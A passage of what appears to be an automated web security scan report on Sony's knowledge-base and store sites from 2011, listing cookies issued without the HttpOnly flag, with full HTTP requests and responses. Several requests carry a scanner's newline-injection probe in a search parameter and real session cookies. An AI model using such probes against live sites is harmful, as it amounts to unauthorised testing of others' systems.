GET /selfservice/closeviewdocument.do?externalId=BNP1USESpdf HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=621E1E69E4996835A7FBF59CEC15156D; Path=/selfservice PRAGMA: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html Content-Length: 0 Date: Tue, 06 Sep 2011 18:56:37 GMT Connection: close
7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/extIFrame.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=044E57DAE7FB0BABCDB708FE81384074; Path=/selfservice The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/common/extIFrame.jsp?docURL=https%3A%2F%2Fwww.docs.sony.com%2FRelease%2FBNP1_US_ES.pdf%23Page%3D1 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=044E57DAE7FB0BABCDB708FE81384074; Path=/selfservice Content-Type: text/html;charset=UTF-8 Content-Length: 1062 Date: Tue, 06 Sep 2011 18:56:01 GMT Connection: close <head> <style type="text/css"> * {padding:0;margin:0} body {margin: 0 0px} </style> <script language="javascript"> //grab the needed sony variables for the si...[SNIP]...
7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_appFooter.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=9040A36B723BD38D401B803C540F0FCC; Path=/selfservice The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/common/viewdocument_appFooter.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=9040A36B723BD38D401B803C540F0FCC; Path=/selfservice Content-Type: text/html;charset=UTF-8 Content-Length: 2794 Date: Tue, 06 Sep 2011 18:56:00 GMT <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#FFFFFF" text=...[SNIP]...
7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_appHeader.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=A073C5F219F136212A7F823E00AE1666; Path=/selfservice The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/common/viewdocument_appHeader.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=A073C5F219F136212A7F823E00AE1666; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Tue, 06 Sep 2011 18:56:00 GMT Content-Length: 4975 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>Search Results Page</title> <link href="/selfservice/c...[SNIP]...
7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/common/viewdocument_forFrameset_Metadata.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=E863918E75FCBD614E29DB14317D33BC; Path=/selfservice The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/common/viewdocument_forFrameset_Metadata.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848 Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=E863918E75FCBD614E29DB14317D33BC; Path=/selfservice Content-Type: text/html;charset=UTF-8 Content-Length: 477 Date: Tue, 06 Sep 2011 18:56:01 GMT Connection: close <html> <head> <title>Search Results Page</title> <link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet"> </head> <body bgcolor="#ffffff" t...[SNIP]...
7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.kb.sony.com
Path:
/selfservice/getUMBrowseImageById.do
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:JSESSIONID=237B9DF2794C1A2815026B92F3AA0455; Path=/selfservice The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /selfservice/getUMBrowseImageById.do?objectId=DT_MANUAL_1_1&imageType=0 HTTP/1.1 Host: www.kb.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1Set-Cookie: JSESSIONID=237B9DF2794C1A2815026B92F3AA0455; Path=/selfservice Location: http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1 Content-Type: image/png;charset=iso-8859-1 Content-Length: 0 Date: Tue, 06 Sep 2011 18:55:51 GMT
7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/ HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135
Response
HTTP/1.1 403 Forbidden Content-Length: 356 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Tue, 06 Sep 2011 18:58:53 GMT Connection: closeSet-Cookie: TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/ X-N: S <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /wcsstore/SonyStyleStorefrontAssetS...[SNIP]...
7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135
Response
HTTP/1.1 200 OK Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT Accept-Ranges: bytes Content-Length: 2538 Content-Type: image/jpeg Date: Tue, 06 Sep 2011 18:58:53 GMT Connection: closeSet-Cookie: TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/ Cache-Control: private ......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K.....[SNIP]...
7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg HTTP/1.1 Host: store.sony.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135
Response
HTTP/1.1 200 OK Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT Accept-Ranges: bytes Content-Length: 2226 Content-Type: image/jpeg Date: Tue, 06 Sep 2011 18:58:53 GMT Connection: closeSet-Cookie: TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/ Cache-Control: private ......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K.....[SNIP]...
7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYErrorRedirect
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:TS5bbf46=2877c4e6d661850e5150d0ea19ef0b38ff7b9fa6284bc12b4e666b3f; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
